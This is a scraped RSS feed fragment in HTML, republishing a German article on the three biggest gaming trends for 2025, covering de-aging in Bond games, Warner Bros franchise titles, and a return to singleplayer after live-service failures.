src="https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_06.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Monolith (Shadows of Mordor) arbeiten bereits seit 2020 an einem Singleplayer-Epos zu Wonder Woman. Die ersten Concept Arts erinnern von der Atmosphäre wohlig an die brillanten Filme mit Gal Gadot." class="wp-image-2569917" srcset="https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_06.jpg?quality=50&amp;strip=all 2560w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_06.jpg?resize=300%2C171&amp;quality=50&amp;strip=all 300w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_06.jpg?resize=768%2C439&amp;quality=50&amp;strip=all 768w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_06.jpg?resize=1200%2C686&amp;quality=50&amp;strip=all 1200w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_06.jpg?resize=1536%2C878&amp;quality=50&amp;strip=all 1536w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_06.jpg?resize=2048%2C1170&amp;quality=50&amp;strip=all 2048w" width="1200" height="686" sizes="(max-width: 1200px) 100vw, 1200px" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge image: Monolith (Shadows of Mordor) arbeiten bereits seit 2020 an einem Singleplayer-Epos zu Wonder Woman. Die ersten Concept Arts erinnern von der Atmosphäre wohlig an die brillanten Filme mit Gal Gadot." data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="context.imageButtonRight" data-wp-style--top="context.imageButtonTop">
			<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
				<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
			</svg>
		</button><figcaption class="wp-element-caption"><p>Monolith (Shadows of Mordor) arbeiten bereits seit 2020 an einem Singleplayer-Epos zu Wonder Woman. Die ersten Concept Arts erinnern von der Atmosphäre wohlig an die brillanten Filme mit Gal Gadot.</p>
</figcaption></figure><p class="imageCredit">MGM und Eon Productions</p></div>



<p>David Zaslav, CEO von Warner Bros Entertainment, zeigte sich sichtlich überrascht, dass <em>Hogwarts Legacy</em> weit über Erwartungen performt hat mit 30 Millionen verkauften Spielen und über einer Milliarde US-Dollar Umsatz.</p>



<p>Genauer gesagt hat <em>Hogwarts Legacy</em> Warners Aktienkurs 2023 gerettet, nachdem diese mit <em>Shazam: Fury of the Gods</em> (Kosten: 125M US-Dollar; eingespielt 133M),<em> The Flash</em> (Kosten: 200 Millionen US-Dollar; eingespielt 271M) und <em>Blue Beetle</em> (Kosten: 120M US-Dollar; eingespielt 130M) gleich drei Superhelden-Filme hatten, die wenig oder gar kein Geld verdient haben.</p>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper">

</div></figure>



<p>Die Gamesbranche kann die größten Probleme von Hollywood lösen. Was ist Hollywoods größtes Problem? <strong>Ihre Stars haben oft keine Lust mehr.</strong></p>



<p>Daniel Radcliffe hat sich schauspielerisch in eine andere Richtung entwickelt, und Emma Watson ist ein gefeiertes Model und stark involviert in ihre Arbeit für die United Nations. „Fragt mich 2027 nochmal“, sagte sie kürzlich Vanity Fair auf die Frage, ob sie nochmal Hermine spielen würde.</p>



<p>Großer Film? Vielleicht. Großes Spiel? Könnte schwieriger werden. </p>



<p><a href="https://www.amazon.de/Hogwarts-Legacy-for-PlayStation-4/dp/B09W4GVQBV/" target="_blank" rel="noreferrer noopener">Hogwarts Legacy</a> hat aber gezeigt, dass Harry Potter auch ohne seine Stars funktioniert.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"uploadedSrc":false,"figureClassNames":"wp-block-image size-large","figureStyles":null,"imgClassNames":"wp-image-2569919","imgStyles":null,"targetWidth":"none","targetHeight":"none","scaleAttr":false,"ariaLabel":"Enlarge image: Hogwarts Legacy hat bewiesen, dass ein talentiertes Team, welches die Vorlage liebt, auch Harry Potter ohne seine Stars inszenieren kann. H\u00e4tten wir gerne Emma Watson und Daniel Radcliff in Spielen? Auf jeden Fall. Aber die wollen nicht.","alt":"Hogwarts Legacy hat bewiesen, dass ein talentiertes Team, welches die Vorlage liebt, auch Harry Potter ohne seine Stars inszenieren kann. H\u00e4tten wir gerne Emma Watson und Daniel Radcliff in Spielen? Auf jeden Fall. Aber die wollen nicht."}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_07.jpeg?quality=50&amp;strip=all&amp;w=1200" alt="Hogwarts Legacy hat bewiesen, dass ein talentiertes Team, welches die Vorlage liebt, auch Harry Potter ohne seine Stars inszenieren kann. Hätten wir gerne Emma Watson und Daniel Radcliff in Spielen? Auf jeden Fall. Aber die wollen nicht." class="wp-image-2569919" srcset="https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_07.jpeg?quality=50&amp;strip=all 2560w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_07.jpeg?resize=300%2C156&amp;quality=50&amp;strip=all 300w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_07.jpeg?resize=768%2C401&amp;quality=50&amp;strip=all 768w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_07.jpeg?resize=1200%2C626&amp;quality=50&amp;strip=all 1200w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_07.jpeg?resize=1536%2C801&amp;quality=50&amp;strip=all 1536w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_07.jpeg?resize=2048%2C1068&amp;quality=50&amp;strip=all 2048w" width="1200" height="626" sizes="(max-width: 1200px) 100vw, 1200px" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge image: Hogwarts Legacy hat bewiesen, dass ein talentiertes Team, welches die Vorlage liebt, auch Harry Potter ohne seine Stars inszenieren kann. Hätten wir gerne Emma Watson und Daniel Radcliff in Spielen? Auf jeden Fall. Aber die wollen nicht." data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="context.imageButtonRight" data-wp-style--top="context.imageButtonTop">
			<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
				<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
			</svg>
		</button><figcaption class="wp-element-caption"><p>Hogwarts Legacy hat bewiesen, dass ein talentiertes Team, welches die Vorlage liebt, auch Harry Potter ohne seine Stars inszenieren kann. Hätten wir gerne Emma Watson und Daniel Radcliff in Spielen? Auf jeden Fall. Aber die wollen nicht.</p>
</figcaption></figure><p class="imageCredit">IDG</p></div>



<p>J.K. Rowling hat jeden Zentimeter von Hogwarts in ihren Büchern in einem Detailgrad beschrieben, der bereits die Filme zu so zauberhaften Welten geformt haben, was sich sehr gut in ein Videospiel adaptieren ließ. </p>



<p>„Wir werden uns im Gaming auf unsere größten Franchises fokussieren: <em>Batman, Game of Thrones, Hogwarts Legacy, Mortal Kombat</em> und ein paar andere Überraschungen aus dem DC-Universum“, verriet Warners CEO in einem Investoren-Call. <em>Hogwarts Legacy 2</em> und <em>Wonder Woman – The Game</em> sind bereits in Entwicklung.</p>



<p><strong>Game of Thrones: Kingsroad</strong> soll eine Welle von Triple-A-Spielen rund um Jon Snow, Deanerys Tagaryen und Cersei Lannister lostreten:</p>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper">

</div></figure>



<p>Die Concept Arts von <em>Wonder Woman</em> spiegeln wundervoll die Atmosphäre und Stil der Filme mit Gal Gadot wider, zeigen das Lasso der Wahrheit sowie Kämpfe gegen Tiger-Bestien in der Heimat der Amazonen Themyscira.</p>



<p>Und Rocksteady kehrt nach <em>Suicide Squad</em> zu Batman zurück – es sieht so aus, als würde die gesamte The-Dark-Knight-Trilogie von Christopher Nolan in ein Singleplayer-Epos gegossen.</p>



<p>Wir könnten uns bei den Überraschungskandidaten auch sehr gut ein <em>Aquaman – The Game</em> vorstellen. Gerade dieses magische Unterwasser-Königreich mit Haien, auf denen wir in die Schlacht reiten, würde sich für einen Open-World-Blockbuster gerade zu aufdrängen!</p>



<h2 class="wp-block-heading toc">Trend 3: Wieder mehr Singleplayer</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"uploadedSrc":false,"figureClassNames":"wp-block-image size-large","figureStyles":null,"imgClassNames":"wp-image-2569923","imgStyles":null,"targetWidth":"none","targetHeight":"none","scaleAttr":false,"ariaLabel":"Enlarge image: Games as a Service bleibt ein schwieriges Thema: Konzeptionell wirkt das oft gro\u00dfartig, wie hier in einem Artwork f\u00fcr Spider-Man The Great Web. Der Multiplayer-Fokus schadet aber meist Geschichte und Heldenreise, die zentral sind f\u00fcr einen Playstation-Blockbuster.","alt":"Games as a Service bleibt ein schwieriges Thema: Konzeptionell wirkt das oft gro\u00dfartig, wie hier in einem Artwork f\u00fcr Spider-Man The Great Web. Der Multiplayer-Fokus schadet aber meist Geschichte und Heldenreise, die zentral sind f\u00fcr einen Playstation-Blockbuster."}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_08.jpeg?quality=50&amp;strip=all&amp;w=1200" alt="Games as a Service bleibt ein schwieriges Thema: Konzeptionell wirkt das oft großartig, wie hier in einem Artwork für Spider-Man The Great Web. Der Multiplayer-Fokus schadet aber meist Geschichte und Heldenreise, die zentral sind für einen Playstation-Blockbuster." class="wp-image-2569923" srcset="https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_08.jpeg?quality=50&amp;strip=all 1920w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_08.jpeg?resize=300%2C168&amp;quality=50&amp;strip=all 300w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_08.jpeg?resize=768%2C431&amp;quality=50&amp;strip=all 768w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_08.jpeg?resize=1200%2C673&amp;quality=50&amp;strip=all 1200w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_08.jpeg?resize=1536%2C862&amp;quality=50&amp;strip=all 1536w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_08.jpeg?resize=1240%2C697&amp;quality=50&amp;strip=all 1240w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_08.jpeg?resize=150%2C84&amp;quality=50&amp;strip=all 150w" width="1200" height="673" sizes="(max-width: 1200px) 100vw, 1200px" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge image: Games as a Service bleibt ein schwieriges Thema: Konzeptionell wirkt das oft großartig, wie hier in einem Artwork für Spider-Man The Great Web. Der Multiplayer-Fokus schadet aber meist Geschichte und Heldenreise, die zentral sind für einen Playstation-Blockbuster." data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="context.imageButtonRight" data-wp-style--top="context.imageButtonTop">
			<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
				<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
			</svg>
		</button><figcaption class="wp-element-caption"><p>Games as a Service bleibt ein schwieriges Thema: Konzeptionell wirkt das oft großartig, wie hier in einem Artwork für Spider-Man The Great Web. Der Multiplayer-Fokus schadet aber meist Geschichte und Heldenreise, die zentral sind für einen Playstation-Blockbuster.</p>
</figcaption></figure><p class="imageCredit">IDG</p></div>



<p>Gaming-CEOs lieben es, Trends zu folgen: 2022 druckte Epic Games mit <em>Fortnite </em>Geld, unglaubliche 4 Milliarden US-Dollar Umsatz. Entsprechend wollte jeder sein eigenes Fortnite.</p>



<p>Die Rechnung ist nicht aufgegangen und hatte unschöne Folgen: <strong>Concord </strong>ist nicht einfach nur gefloppt, es hat 200 Arbeitsplätze gekostet, weil das Studio direkt geschlossen wurde.</p>



<p><a href="https://www.pcwelt.de/article/2473833/concord-was-ist-bei-sonys-mega-shooter-schiefgelaufen.html" target="_blank" rel="noreferrer noopener">Concord: Was ist bei Sonys Mega-Shooter schiefgelaufen?</a></p>



<p>Und Ubisoft ist mit<strong> Skull &amp; Bones</strong> baden gegangen (der Steam-Peak lag im August bei 2615 gleichzeitigen Spielern; aktuell sind es noch 244) und sogar das ziemlich großartige <strong>XDefiance </strong>von Call-of-Duty-Entwicklern wird 2025 offline gehen.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"uploadedSrc":false,"figureClassNames":"wp-block-image size-large","figureStyles":null,"imgClassNames":"wp-image-2569926","imgStyles":null,"targetWidth":"none","targetHeight":"none","scaleAttr":false,"ariaLabel":"Enlarge image: Suicide Squad: Kill the Justice League zeigt, warum Games-as-Service so unbeliebt ist. Die Story ist klasse, die Open-World auf Rocksteady-Niveau. Aber das Gameplay auf Level-Grind ausgelegt, weil Warner Skins verkaufen wollte.","alt":"Suicide Squad: Kill the Justice League zeigt, warum Games-as-Service so unbeliebt ist. Die Story ist klasse, die Open-World auf Rocksteady-Niveau. Aber das Gameplay auf Level-Grind ausgelegt, weil Warner Skins verkaufen wollte."}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_09.jpeg?quality=50&amp;strip=all&amp;w=1200" alt="Suicide Squad: Kill the Justice League zeigt, warum Games-as-Service so unbeliebt ist. Die Story ist klasse, die Open-World auf Rocksteady-Niveau. Aber das Gameplay auf Level-Grind ausgelegt, weil Warner Skins verkaufen wollte." class="wp-image-2569926" srcset="https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_09.jpeg?quality=50&amp;strip=all 1280w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_09.jpeg?resize=300%2C168&amp;quality=50&amp;strip=all 300w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_09.jpeg?resize=768%2C433&amp;quality=50&amp;strip=all 768w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_09.jpeg?resize=1200%2C677&amp;quality=50&amp;strip=all 1200w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_09.jpeg?resize=1240%2C697&amp;quality=50&amp;strip=all 1240w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_09.jpeg?resize=150%2C84&amp;quality=50&amp;strip=all 150w" width="1200" height="677" sizes="(max-width: 1200px) 100vw, 1200px" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge image: Suicide Squad: Kill the Justice League zeigt, warum Games-as-Service so unbeliebt ist. Die Story ist klasse, die Open-World auf Rocksteady-Niveau. Aber das Gameplay auf Level-Grind ausgelegt, weil Warner Skins verkaufen wollte." data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="context.imageButtonRight" data-wp-style--top="context.imageButtonTop">
			<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
				<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
			</svg>
		</button><figcaption class="wp-element-caption"><p>Suicide Squad: Kill the Justice League zeigt, warum Games-as-Service so unbeliebt ist. Die Story ist klasse, die Open-World auf Rocksteady-Niveau. Aber das Gameplay auf Level-Grind ausgelegt, weil Warner Skins verkaufen wollte.</p>
</figcaption></figure><p class="imageCredit">IDG</p></div>



<p>Warum funktioniert <strong>Games as as Service </strong>so oft nicht? <em>Suicide Squad</em> hat vieles, was ein gutes Rocksteady-Game braucht: Eine wunderschöne Open-World, fantastische Cutscenes, coole Charaktere. Aber das Gameplay besteht darin, dass wir permanent Wellen von Gegnern plätten. Oder absurd langsame Fahrzeug-Kolonnen beschützen.</p>



<p>Es ist auf stupiden Level-Grind ausgelegt, bei denen wir die Punkte in ein völlig überladenes Upgrade-Menü investieren. Rocksteady ist eines der besten Studios der Branche – es ist geradezu grotesk, was für ein schlechtes Spiel sie hier abgeliefert haben, nur weil man Skins verkaufen wollte.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"uploadedSrc":false,"figureClassNames":"wp-block-image size-large","figureStyles":null,"imgClassNames":"wp-image-2569928","imgStyles":null,"targetWidth":"none","targetHeight":"none","scaleAttr":false,"ariaLabel":"Enlarge image: Was viele Publishing Executives nicht verstanden haben: Eine Service-Welt im Fortnite-Stil braucht ein sehr gutes Spiel als Basis. Sowohl Suicide Squad als auch Skull \u0026 Bones sind eher schwache Erlebnisse, auf die sich keine neuen Welten aufsetzen lassen.","alt":"Was viele Publishing Executives nicht verstanden haben: Eine Service-Welt im Fortnite-Stil braucht ein sehr gutes Spiel als Basis. Sowohl Suicide Squad als auch Skull \u0026 Bones sind eher schwache Erlebnisse, auf die sich keine neuen Welten aufsetzen lassen."}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_10.jpeg?quality=50&amp;strip=all&amp;w=1200" alt="Was viele Publishing Executives nicht verstanden haben: Eine Service-Welt im Fortnite-Stil braucht ein sehr gutes Spiel als Basis. Sowohl Suicide Squad als auch Skull &amp; Bones sind eher schwache Erlebnisse, auf die sich keine neuen Welten aufsetzen lassen." class="wp-image-2569928" srcset="https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_10.jpeg?quality=50&amp;strip=all 1920w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_10.jpeg?resize=300%2C168&amp;quality=50&amp;strip=all 300w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_10.jpeg?resize=768%2C432&amp;quality=50&amp;strip=all 768w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_10.jpeg?resize=1200%2C675&amp;quality=50&amp;strip=all 1200w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_10.jpeg?resize=1536%2C864&amp;quality=50&amp;strip=all 1536w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_10.jpeg?resize=1240%2C697&amp;quality=50&amp;strip=all 1240w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_10.jpeg?resize=150%2C84&amp;quality=50&amp;strip=all 150w" width="1200" height="675" sizes="(max-width: 1200px) 100vw, 1200px" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge image: Was viele Publishing Executives nicht verstanden haben: Eine Service-Welt im Fortnite-Stil braucht ein sehr gutes Spiel als Basis. Sowohl Suicide Squad als auch Skull &amp; Bones sind eher schwache Erlebnisse, auf die sich keine neuen Welten aufsetzen lassen." data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="context.imageButtonRight" data-wp-style--top="context.imageButtonTop">
			<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
				<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
			</svg>
		</button><figcaption class="wp-element-caption"><p>Was viele Publishing Executives nicht verstanden haben: Eine Service-Welt im Fortnite-Stil braucht ein sehr gutes Spiel als Basis. Sowohl Suicide Squad als auch Skull &amp; Bones sind eher schwache Erlebnisse, auf die sich keine neuen Welten aufsetzen lassen.</p></figcaption></figure><p class="imageCredit">IDG</p></div>



<p>Denn Skins und der Verkauf von Upgrades sind der einzige Grund, warum das Missions-Design so daneben ist – ein Service-Game muss endlos laufen; es kann nicht in einem epischen Story-Finale enden. Im Grunde wollte man hier die Fortnite-Teenies abholen, die sich für Harley Quinn ein sexy Outfit kaufen, und damit das gleiche Level zum hundertsten Mal spielen. </p>



<p>Alle wollen ein <em>Fortnite </em>haben und verstehen nicht, dass <em>Fortnite </em>ein sehr gutes Basisspiel ist, welches Epic Games jede Season mit neuen Mechaniken und Welten erweitert. Rocksteady kann kein <em>Fortnite</em>, Gott sei Dank möchte man sagen, denn so dürfen sie jetzt wieder richtige Batman-Singleplayer-Spiele entwickeln.</p>



<p>Auch Sony lässt seine Studios jetzt wieder daran arbeiten, was diese am besten können. Naughty Dog arbeitet etwa an einem brandneuen Spiel im Sci-Fi-Setting, inklusive Weltraum-Porsche und Adidas-Sneakern.</p>



<p><a href="https://www.pcwelt.de/intergalactic-the-heretic-prophet-preview/" target="_blank" rel="noreferrer noopener">Intergalactic: The Heretic Prophet in der Preview – Kopfgeldjagd im Weltraum-Porsche</a></p>



<p>Man hat wohl eingesehen, dass es nicht sinnvoll wäre, mit Naughty Dog eines seiner besten Studios für ein Multiplayer-Experiment einzusetzen, welches mit hoher Wahrscheinlichkeit ihrem Image schaden und nicht so erfolgreich sein wird wie ein Singleplayer-Blockbuster. </p>



<p>Die haben ja nicht nur Spielegeschichte geschrieben, sondern richtig viel Geld verdient… und darauf sollten sich die Publisher mal zurückbesinnen.</p>



<p><strong>Die Verkaufszahlen der letzten Naughty-Dog-Games:</strong></p>



<figure class="wp-block-table"><table class="has-fixed-layout"><tbody><tr><td>Uncharted 4</td><td>18,6 Millionen verkaufte Spiele</td></tr><tr><td>The Last of Us</td><td>20 Millionen verkaufte Spiele</td></tr><tr><td>The Last of Us Remaster</td><td>18 Millionen verkaufte Spiele</td></tr><tr><td>The Last of Us 2</td><td>10,3 Millionen verkaufte Spiele</td></tr></tbody></table></figure>



<p>Ob diese drei Trends wirklich so eintreten wird, ist momentan noch nicht absehbar. Klar ist nur: Das Spielejahr 2025 wird spannender denn je. Auch dank neuer Konsolen wie der <a href="https://www.pcwelt.de/article/2522347/ps5-pro-praxis-test.html" target="_blank" rel="noreferrer noopener">PS5 Pro</a> oder der bald erscheinenden <a href="https://www.pcwelt.de/article/2579205/nintendo-switch-2-ankuendigung-release-specs-trailer.html" target="_blank" rel="noreferrer noopener">Nintendo Switch 2.</a></p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Die drei größten Gaming-Trends 2025]]></title>
<description><![CDATA[Das Gaming-Jahr 2024 ist vorbei und brachte einige neue Entwicklungen mit sich. Sowohl positive als auch negative.



Höchste Zeit also für einen Blick in die Glaskugel: Was könnten die größten Trends für 2025 werden?



Trend 1: Bringt De-aging die größten James-Bonds zurück?



			
				
			
		0...]]></description>
<link>https://tsecurity.de/de/2566743/windows-tipps/die-drei-groessten-gaming-trends-2025/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2566743/windows-tipps/die-drei-groessten-gaming-trends-2025/</guid>
<pubDate>Wed, 22 Jan 2025 13:38:22 +0100</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Das Gaming-Jahr 2024 ist vorbei und brachte einige neue Entwicklungen mit sich. Sowohl positive als auch negative.</p>



<p>Höchste Zeit also für einen Blick in die Glaskugel: Was könnten die größten Trends für 2025 werden?</p>



<h2 class="wp-block-heading toc">Trend 1: Bringt De-aging die größten James-Bonds zurück?</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"uploadedSrc":false,"figureClassNames":"wp-block-image size-large","figureStyles":null,"imgClassNames":"wp-image-2569900","imgStyles":null,"targetWidth":"none","targetHeight":"none","scaleAttr":false,"ariaLabel":"Enlarge image: 007 Nightfire hatte alles, was ein gutes Bond-Game braucht: Pierce Brosnan, hei\u00dfe Bond-Girls, wilde Schie\u00dfereien und Aston-Martin-Verfolgungsjagden.","alt":"007 Nightfire hatte alles, was ein gutes Bond-Game braucht: Pierce Brosnan, hei\u00dfe Bond-Girls, wilde Schie\u00dfereien und Aston-Martin-Verfolgungsjagden."}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_02.jpg?quality=50&amp;strip=all&amp;w=1200" alt="007 Nightfire hatte alles, was ein gutes Bond-Game braucht: Pierce Brosnan, heiße Bond-Girls, wilde Schießereien und Aston-Martin-Verfolgungsjagden." class="wp-image-2569900" srcset="https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_02.jpg?quality=50&amp;strip=all 1920w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_02.jpg?resize=300%2C117&amp;quality=50&amp;strip=all 300w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_02.jpg?resize=768%2C298&amp;quality=50&amp;strip=all 768w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_02.jpg?resize=1200%2C466&amp;quality=50&amp;strip=all 1200w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_02.jpg?resize=1536%2C597&amp;quality=50&amp;strip=all 1536w" width="1200" height="466" sizes="(max-width: 1200px) 100vw, 1200px" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge image: 007 Nightfire hatte alles, was ein gutes Bond-Game braucht: Pierce Brosnan, heiße Bond-Girls, wilde Schießereien und Aston-Martin-Verfolgungsjagden." data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="context.imageButtonRight" data-wp-style--top="context.imageButtonTop">
			<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
				<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
			</svg>
		</button><figcaption class="wp-element-caption"><p>007 Nightfire hatte alles, was ein gutes Bond-Game braucht: Pierce Brosnan, heiße Bond-Girls, wilde Schießereien und Aston-Martin-Verfolgungsjagden.</p>
</figcaption></figure><p class="imageCredit">IDG</p></div>



<p>Industrial Might &amp; Magic überraschte uns alle in <em>Indiana Jones und das Rad des Schicksals</em>, wie gut mittlerweile <strong>De-aging-Technologie</strong> funktioniert.</p>



